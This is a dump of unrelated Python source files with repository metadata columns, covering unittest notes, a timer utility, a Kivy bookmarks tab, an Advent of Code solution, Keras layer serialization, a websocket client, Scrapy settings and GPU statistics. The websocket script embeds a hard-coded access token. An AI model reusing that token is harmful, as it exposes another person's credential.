        inputs,  # only used for masks
        targets,
        targets_positions=targets_positions,
        inputs_segmentation=inputs_segmentation,
        targets_segmentation=targets_segmentation)
| 31.43038 | 79 | 0.663541 |
795c8724aa06a697b7ffecde0f34d6198d488266 | 1,586 | py | Python | Python/Essential things/testing.py | honchardev/Fun | ca7c0076e9bb3017c5d7e89aa7d5bd54a83c8ecc | [
"MIT"
] | null | null | null | Python/Essential things/testing.py | honchardev/Fun | ca7c0076e9bb3017c5d7e89aa7d5bd54a83c8ecc | [
"MIT"
] | 3 | 2020-03-24T16:26:35.000Z | 2020-04-15T19:40:41.000Z | Python/Essential things/testing.py | honchardev/Fun | ca7c0076e9bb3017c5d7e89aa7d5bd54a83c8ecc | [
"MIT"
] | null | null | null | import unittest
class TestUM(unittest.TestCase):
def setUp(self):
"""This method executes BEFORE each test"""
pass
def tearDown(self):
"""This method executes AFTER each test"""
pass
"""
def setUpClass(cls):
# This method executes BEFORE ALL tests
print('Testing begins.')
def tearDownClass(cls):
# This method executes AFTER ALL tests
print('Testing complete.')
"""
def test_numbers_3_4(self):
self.assertEqual(3*4, 12)
def test_strings_a_3(self):
self.assertEqual('a'*3, 'aaa')
"""
List of different checks:
testAssertTrue | Invoke error, if argument != True
testFailUnless | (Outdated) Invoke error, if argument != True
testAssertFalse | Invoke error, if argument != False
testFailIf | (Outdated) Invoke error, if argument != False
testEqual | Check if two arguments are equal.
testEqualFail | (Outdated) Invoke error, if arguments are equal
testNotEqual | Check if two arguments aren't equal
testNotEqualFail | (Outdated) Invoke error, if arguments aren't equal
assertNotAlmostEqual | Compare two arguments with rounding. Invoke error if arguments are equal.
testNotAlmostEqual | (Outdated) Same as assertNotAlmostEqual
assertAlmostEqual | Compare two arguments with rounding. Invoke error if arguments aren't equal.
testAlmostEqual | (Outdated) Same as assertAlmostEqual
"""
if __name__ == '__main__':
unittest.main()
# Pretty interesting: http://www.drdobbs.com/testing/unit-testing-with-python/240165163
| 28.836364 | 98 | 0.691047 |
795c88188f258fbe30dd9b3ce08d4e5848afb0cc | 604 | py | Python | timer.py | measiala/ctools | 2776f63222d2fa934adcbbd51dc048c2391e45bd | [
"CC0-1.0"
] | null | null | null | timer.py | measiala/ctools | 2776f63222d2fa934adcbbd51dc048c2391e45bd | [
"CC0-1.0"
] | null | null | null | timer.py | measiala/ctools | 2776f63222d2fa934adcbbd51dc048c2391e45bd | [
"CC0-1.0"
] | null | null | null | import sys
import time
def print_stderr(s):
    """Default Timer notifier: write *s* followed by a newline to stderr."""
    sys.stderr.write(f"{s}\n")
class Timer:
    """Context manager that measures wall-clock time spent in a `with` block.

    On exit the elapsed seconds are stored on ``self.interval`` and reported
    through ``notifier`` using ``message``.  A message containing a '%' is
    used as a printf-style format; any other message gets ' %f seconds'
    appended so it can act as a plain prefix.
    """

    def __init__(self, message='Elapsed time:', notifier=print_stderr):
        self.notifier = notifier
        # A message without a placeholder is treated as a prefix.
        self.message = message if '%' in message else message + " %f seconds"

    def __enter__(self):
        self.start = time.time()
        return self

    def __exit__(self, *args):
        self.end = time.time()
        self.interval = self.end - self.start
        if self.message:
            self.notifier(self.message % self.interval)
795c88cb1dd9a26b5483b450cfa1e5b775227713 | 2,393 | py | Python | YTV/mywidgets/tmscreen_contents/booktab.py | Eghosa-Osayande/ytv-series-downloader | 6b0efa69ca002279226ac6063e1bbc3eae9b2c97 | [
"MIT"
] | 1 | 2020-11-22T20:30:28.000Z | 2020-11-22T20:30:28.000Z | YTV/mywidgets/tmscreen_contents/booktab.py | yande-eghosa/ytv-series-downloader | 6b0efa69ca002279226ac6063e1bbc3eae9b2c97 | [
"MIT"
] | null | null | null | YTV/mywidgets/tmscreen_contents/booktab.py | yande-eghosa/ytv-series-downloader | 6b0efa69ca002279226ac6063e1bbc3eae9b2c97 | [
"MIT"
] | null | null | null | import cfg
from kivymd.uix.bottomnavigation import *
from kivymd.uix.bottomsheet import *
from kivy.clock import Clock
from kivy.properties import *
from threading import Thread
import ytvApi as ytv
from kivy.lang import Builder
Builder.load_string('''
<BookTab>:
name:'s3'
icon:'star'
text:'BookMarks'
MDBoxLayout:
orientation:'vertical'
MDBoxLayout:
adaptive_height:True
MDRectangleFlatButton:
size_hint_y:None
md_bg_color:0,0,0,1
icon:'trash-can'
text:'Clear Bookmarks'
on_release:root.confirm_delete()
MDRectangleFlatButton:
size_hint_y:None
md_bg_color:0,0,0,1
#icon:'trash-can'
text:'History'
on_release:root.open_history()
RecycleView:
id: book_rv
size_hint_y:
key_viewclass: 'viewclass'
key_size: 'height'
RecycleGridLayout:
id: book_rb
default_size: None, dp(200)
default_size_hint: 1, None
size_hint_y: None
height: self.minimum_height
cols:3
spacing:dp(2)
''')
class BookTab(MDBottomNavigationItem):#FloatLayout, MDTabsBase):
    """Bottom-navigation tab showing the user's bookmarked series."""
    datum=ObjectProperty([])  # RecycleView data (list of viewclass dicts)
    bug=ObjectProperty(False)  # when True, sync() pushes fresh data into the RV
    def __init__(self,**kw):
        super(BookTab,self).__init__(**kw)
        # Publish this instance globally so other screens can reach it.
        global BOOKTAB
        BOOKTAB=cfg.BOOKTAB=self
        # Tick sync() once per second; sync() cancels this clock on its first run.
        self.clk1=Clock.schedule_interval(self.sync,1)
    def open_history(self,*a):
        """Switch the app to the history screen."""
        cfg.SM.current='historyscreen'
    def confirm_delete(self,*a):
        """Show a bottom sheet asking the user to confirm clearing bookmarks."""
        if True:
            self.genre_menu = MDListBottomSheet()
            self.genre_menu.add_item('Cancel',lambda *zz:self.genre_menu.dismiss(),icon='cancel')
            self.genre_menu.add_item('Clear All BookMarks?',lambda *a:self.delete(),icon='delete')
            self.genre_menu.open()
    def delete(self,*a):
        """Clear every bookmark, refresh the tab, and toast a confirmation."""
        bk=ytv.BookMarks()
        from kivymd.toast import toast
        # NOTE(review): this try/except guards a plain assignment that cannot
        # raise -- it looks like dead/leftover code.
        try:
            b_seasons={}
        except:
            pass
        bk.clear_bk()
        self.bug=True
        self.sync()
        toast(f'Bookmarks Cleared')
    def on_enter(self,*a):
        """Push the cached data into the RecycleView when the tab is shown."""
        self.ids.book_rv.data=self.datum
        self.bug=False
    def sync(self,*a):
        """Rebuild `datum` from the bookmark store on a background thread."""
        # First invocation stops the 1 s polling clock started in __init__.
        self.clk1.cancel()
        # Inner worker intentionally shadows the method name; it runs off the
        # UI thread and writes back via the `datum` property.
        def sync(self):
            s=ytv.BookMarks()
            bk=s.get_bk()
            data=[]
            for name in bk.keys():
                data.append({ 'viewclass':'BookCard','name':name })
            if len(data)==0:
                data=[{ 'viewclass':'YLabel','text':'No Bookmarks','halign':'center' }]
            self.datum=data
            if self.bug:
                self.on_enter()
        Thread(target=sync,args=(self,),daemon=True).start()
795c892a8f76fe0f4b498c1810c74c7facaae37b | 704 | py | Python | 2020/day2/day2.py | victormartinez/adventofcode | 347ae0ae6e9223265d0ad61794e3976525e7497e | [
"MIT"
] | null | null | null | 2020/day2/day2.py | victormartinez/adventofcode | 347ae0ae6e9223265d0ad61794e3976525e7497e | [
"MIT"
] | null | null | null | 2020/day2/day2.py | victormartinez/adventofcode | 347ae0ae6e9223265d0ad61794e3976525e7497e | [
"MIT"
] | null | null | null | from pathlib import Path
def get_file_rows():
    """Return an iterator over the non-empty lines of ``input.txt``."""
    lines = Path("input.txt").read_text().split("\n")
    return (line for line in lines if line)
def parse_row(row):
    """Split a policy line like ``"1-3 a: abcde"`` into (min, max, char, password)."""
    cleaned = row.replace(":", "").replace("-", " ")
    lo, hi, char, password = cleaned.split(" ")
    return int(lo), int(hi), char, password


def count_valid_passwords(rows):
    """Count rows whose password contains ``char`` between min and max times."""
    return sum(
        lo <= password.count(char) <= hi
        for lo, hi, char, password in map(parse_row, rows)
    )
def execute():
    """Read the puzzle input and print how many passwords are valid."""
    result = count_valid_passwords(get_file_rows())
    print(f"Valid passwords: {result}")


if __name__ == "__main__":
    execute()
| 22 | 79 | 0.619318 |
795c8b2b19114377dea4734ae4c8a6bdbdaed262 | 4,256 | py | Python | tensorflow/python/keras/layers/serialization.py | junhee-yoo/tensorflow | 90169feba2d0b082e26c58f7264c353778ffe361 | [
"Apache-2.0"
] | 2 | 2019-08-04T20:28:14.000Z | 2019-10-27T23:26:42.000Z | tensorflow/python/keras/layers/serialization.py | omalleyt12/tensorflow | 4af94829b94a15c4dc51571a2ddf5a015a81d98a | [
"Apache-2.0"
] | 1 | 2019-08-19T08:03:52.000Z | 2019-08-19T08:03:52.000Z | tensorflow/python/keras/layers/serialization.py | omalleyt12/tensorflow | 4af94829b94a15c4dc51571a2ddf5a015a81d98a | [
"Apache-2.0"
] | 1 | 2018-09-03T18:32:25.000Z | 2018-09-03T18:32:25.000Z | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Layer serialization/deserialization functions.
"""
# pylint: disable=wildcard-import
# pylint: disable=unused-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python import tf2
from tensorflow.python.keras.engine.base_layer import AddLoss
from tensorflow.python.keras.engine.base_layer import AddMetric
from tensorflow.python.keras.engine.base_layer import TensorFlowOpLayer
from tensorflow.python.keras.engine.input_layer import Input
from tensorflow.python.keras.engine.input_layer import InputLayer
from tensorflow.python.keras.layers.advanced_activations import *
from tensorflow.python.keras.layers.convolutional import *
from tensorflow.python.keras.layers.convolutional_recurrent import *
from tensorflow.python.keras.layers.core import *
from tensorflow.python.keras.layers.cudnn_recurrent import *
from tensorflow.python.keras.layers.embeddings import *
from tensorflow.python.keras.layers.local import *
from tensorflow.python.keras.layers.merge import *
from tensorflow.python.keras.layers.noise import *
from tensorflow.python.keras.layers.normalization import *
from tensorflow.python.keras.layers.pooling import *
from tensorflow.python.keras.layers.recurrent import *
from tensorflow.python.keras.layers.rnn_cell_wrapper_v2 import *
from tensorflow.python.keras.layers.wrappers import *
from tensorflow.python.keras.utils.generic_utils import deserialize_keras_object
from tensorflow.python.util.tf_export import keras_export
if tf2.enabled():
from tensorflow.python.keras.layers.normalization_v2 import * # pylint: disable=g-import-not-at-top
from tensorflow.python.keras.layers.recurrent_v2 import * # pylint: disable=g-import-not-at-top
# This deserialization table is added for backward compatibility, as in TF 1.13,
# BatchNormalizationV1 and BatchNormalizationV2 are used as class name for v1
# and v2 version of BatchNormalization, respectively. Here we explicitly convert
# them to the canonical name in the config of deserialization.
_DESERIALIZATION_TABLE = {
    'BatchNormalizationV1': 'BatchNormalization',  # TF 1.13 v1 class name
    'BatchNormalizationV2': 'BatchNormalization',  # TF 1.13 v2 class name
}
@keras_export('keras.layers.serialize')
def serialize(layer):
  """Serializes a layer into a JSON-compatible config dict.

  Arguments:
    layer: a Keras layer (any object exposing `get_config()`).

  Returns:
    A dict of the form `{'class_name': str, 'config': dict}` suitable for
    `deserialize()`.
  """
  return {'class_name': layer.__class__.__name__, 'config': layer.get_config()}
@keras_export('keras.layers.deserialize')
def deserialize(config, custom_objects=None):
  """Instantiates a layer from a config dictionary.

  Arguments:
      config: dict of the form {'class_name': str, 'config': dict}
      custom_objects: dict mapping class names (or function names)
          of custom (non-Keras) objects to class/functions

  Returns:
      Layer instance (may be Model, Sequential, Network, Layer...)
  """
  # Prevent circular dependencies.
  from tensorflow.python.keras import models  # pylint: disable=g-import-not-at-top
  from tensorflow.python.feature_column import dense_features  # pylint: disable=g-import-not-at-top

  # This module's globals (all layer classes imported above) serve as the
  # lookup namespace; model classes are injected so nested models deserialize.
  globs = globals()  # All layers.
  globs['Network'] = models.Network
  globs['Model'] = models.Model
  globs['Sequential'] = models.Sequential

  # Prevent circular dependencies with FeatureColumn serialization.
  globs['DenseFeatures'] = dense_features.DenseFeatures

  # Map legacy TF 1.13 class names to the canonical name.
  # NOTE: mutates the caller's `config` dict in place.
  layer_class_name = config['class_name']
  if layer_class_name in _DESERIALIZATION_TABLE:
    config['class_name'] = _DESERIALIZATION_TABLE[layer_class_name]

  return deserialize_keras_object(
      config,
      module_objects=globs,
      custom_objects=custom_objects,
      printable_module_name='layer')
| 42.989899 | 102 | 0.776786 |
795c8b3b12da8483c8c32df738411e472244974e | 451 | py | Python | users/users/admin_api/context.py | madEng84/pycon | 31d71b7a86398a7b0518e909ae939aaffd181091 | [
"MIT"
] | 56 | 2018-01-20T17:18:40.000Z | 2022-03-28T22:42:04.000Z | users/users/admin_api/context.py | madEng84/pycon | 31d71b7a86398a7b0518e909ae939aaffd181091 | [
"MIT"
] | 2,029 | 2018-01-20T11:37:24.000Z | 2022-03-31T04:10:51.000Z | users/users/admin_api/context.py | madEng84/pycon | 31d71b7a86398a7b0518e909ae939aaffd181091 | [
"MIT"
] | 17 | 2018-03-17T09:44:28.000Z | 2021-12-27T19:57:35.000Z | from __future__ import annotations
from dataclasses import dataclass
from sqlalchemy.ext.asyncio import AsyncSession
from starlette.requests import Request
from users.domain.repository import UsersRepository
@dataclass
class Info:
    """Wrapper handed to resolvers; carries the per-request `Context`."""

    # The request-scoped context (request + DB session).
    context: Context
@dataclass
class Context:
    """Per-request dependencies: the HTTP request and an async DB session."""

    # Incoming Starlette request.
    request: Request
    # SQLAlchemy async session scoped to this request.
    session: AsyncSession

    @property
    def users_repository(self) -> UsersRepository:
        # A fresh repository bound to this request's session on each access.
        return UsersRepository(session=self.session)
| 18.791667 | 52 | 0.784922 |
795c8be201f0666154bcf46ac9e744264a481d3a | 850 | py | Python | boss-key_wio-link_2.py | awong1900/Boss-Key_Wio-link | d18ab3a07783edd339bbb72d0310345197b350a0 | [
"Apache-2.0"
] | null | null | null | boss-key_wio-link_2.py | awong1900/Boss-Key_Wio-link | d18ab3a07783edd339bbb72d0310345197b350a0 | [
"Apache-2.0"
] | null | null | null | boss-key_wio-link_2.py | awong1900/Boss-Key_Wio-link | d18ab3a07783edd339bbb72d0310345197b350a0 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
import websocket
import thread
import time
def on_message(ws, message):
    # Print every event pushed by the server (Python 2 print statement).
    print message
def on_error(ws, error):
    # Log websocket errors to stdout.
    print error
def on_close(ws):
    # Announce that the connection was closed.
    print "### closed ###"
def on_open(ws):
    # Authenticate right after connecting by sending an access token.
    # NOTE(review): token is hard-coded — presumably a Wio Link node key;
    # confirm and rotate before reuse.
    ws.send("5e91e4a43b451c5af5efee3e13599cf5")
# Disabled demo: periodically send messages from a background thread.
# def run(*args):
#     for i in range(30000):
#         time.sleep(1)
#         ws.send("Hello %d" % i)
#     time.sleep(1)
#     ws.close()
#     print "thread terminating..."
# thread.start_new_thread(run, ())
if __name__ == "__main__":
    websocket.enableTrace(True)
    # Subscribe to the Wio Link node event stream; the callbacks defined
    # above handle messages, errors and close events.
    ws = websocket.WebSocketApp("wss://cn.iot.seeed.cc/v1/node/event",
                              on_message = on_message,
                              on_error = on_error,
                              on_close = on_close)
    ws.on_open = on_open
    # Blocks forever; no automatic reconnect is configured.
    ws.run_forever()
| 23.611111 | 70 | 0.552941 |
795c8d7c0b8949ee32cdf3f3575f573012be6083 | 1,050 | py | Python | scrapy/conf.py | ajah/scrapy | 9685c24059a1eb95216dcab8f76805c8c0025a60 | [
"BSD-3-Clause"
] | 5 | 2019-04-02T05:00:03.000Z | 2021-04-21T11:03:50.000Z | scrapy/conf.py | xiongww/scrapy | f012cecbd8d32317529c6859e691083ba07ca117 | [
"BSD-3-Clause"
] | null | null | null | scrapy/conf.py | xiongww/scrapy | f012cecbd8d32317529c6859e691083ba07ca117 | [
"BSD-3-Clause"
] | null | null | null | """
Scrapy settings manager
See documentation in docs/topics/settings.rst
"""
import os
import cPickle as pickle
from scrapy.settings import CrawlerSettings
from scrapy.utils.conf import init_env
# Environment variable that names the project's settings module.
ENVVAR = 'SCRAPY_SETTINGS_MODULE'
def get_project_settings():
    """Build a CrawlerSettings object for the active Scrapy project.

    Initializes the project environment when SCRAPY_SETTINGS_MODULE is
    unset, imports the settings module (falling back to None on failure),
    then applies overrides from pickled settings and from every SCRAPY_*
    environment variable.
    """
    if ENVVAR not in os.environ:
        init_env(os.environ.get('SCRAPY_PROJECT', 'default'))

    module_path = os.environ.get(ENVVAR, 'scrapy_settings')
    try:
        module = __import__(module_path, {}, {}, [''])
    except ImportError:
        module = None
    settings = CrawlerSettings(module)

    # XXX: remove this hack
    pickled = os.environ.get("SCRAPY_PICKLED_SETTINGS_TO_OVERRIDE")
    if pickled:
        settings.overrides = pickle.loads(pickled)
    else:
        settings.overrides = {}

    # XXX: deprecate and remove this functionality
    for key, value in os.environ.items():
        if key.startswith('SCRAPY_'):
            settings.overrides[key[7:]] = value
    return settings
# Module-level singleton, built once at import time.
settings = get_project_settings()
| 27.631579 | 83 | 0.715238 |
795c8e7330a6bc9c079fc95e44753e0091aa94c1 | 1,111 | py | Python | kolejka/common/gpu.py | Raalsky/kolejka | af0b4d8fa2e4dddfb6b6806fb0fd1639ba4f71f6 | [
"MIT"
] | null | null | null | kolejka/common/gpu.py | Raalsky/kolejka | af0b4d8fa2e4dddfb6b6806fb0fd1639ba4f71f6 | [
"MIT"
] | 1 | 2021-08-18T18:05:37.000Z | 2021-08-18T18:05:37.000Z | kolejka/common/gpu.py | Raalsky/kolejka | af0b4d8fa2e4dddfb6b6806fb0fd1639ba4f71f6 | [
"MIT"
] | null | null | null | import gpustat
from kolejka.common.limits import KolejkaStats
def normalize_name(name: str) -> str:
    """Turn a GPU product name into a lowercase dash-joined id, dropping
    the first (vendor) word, e.g. "NVIDIA GeForce GTX 1080" -> "geforce-gtx-1080".
    """
    words = name.lower().split(' ')
    return '-'.join(words[1:])
def gpu_stats(gpus: list = None):
    """Collect per-GPU statistics via gpustat into a KolejkaStats object.

    Only GPUs whose stringified index appears in `gpus` are included;
    `None` means include all GPUs. Memory figures are converted from MiB
    to bytes.
    """
    query = gpustat.GPUStatCollection.new_query()
    mib = 1024 * 1024
    per_gpu = {}
    for index, gpu in enumerate(query.gpus):
        key = str(index)
        if gpus is not None and key not in gpus:
            continue
        per_gpu[key] = {
            'name': gpu.name,
            'id': normalize_name(gpu.name),
            'total_memory': gpu.memory_total * mib,
            'memory_usage': gpu.memory_total * mib - gpu.memory_free * mib,
            'max_temperature': gpu.temperature,
            'max_utilization': gpu.utilization,
        }
    stats = KolejkaStats()
    stats.load({'gpus': per_gpu})
    return stats
def full_gpuset():
    """Return the list of indices of every GPU visible to gpustat."""
    gpu_count = len(gpustat.GPUStatCollection.new_query().gpus)
    return list(range(gpu_count))
def limited_gpuset(full, gpus, gpus_offset):
    """Pick `gpus` consecutive GPU indices (as strings) out of `full`,
    starting at `gpus_offset` (defaults to 0) and wrapping around."""
    start = 0 if gpus_offset is None else gpus_offset
    size = len(full)
    return [str((start + i) % size) for i in range(gpus)]
| 28.487179 | 95 | 0.591359 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.